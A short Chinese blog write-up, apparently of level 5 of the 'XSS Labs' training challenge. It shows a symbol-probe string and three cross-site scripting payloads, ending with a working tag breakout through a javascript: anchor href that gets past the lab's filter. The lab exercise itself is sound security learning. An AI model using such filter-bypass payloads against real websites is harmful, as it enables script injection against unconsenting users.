XSS Labs-Level5题解

一、测试
先试试有没有符号过滤payload:'';!--"<xss>=&{()}

image1

二、尝试攻击
没有什么发现,试试常规payload:<script>alert()</script>

image2

可以看到script被过滤了,再试试onmouseover事件:"onmouseover='alert(1)'

image3

也被过滤了

那么试试a标签,payload:"><a href=javascript:alert()><"

image4

成功!

posted @ 2025-12-03 09:22  shinianyunyan  阅读(6)  评论(0)    收藏  举报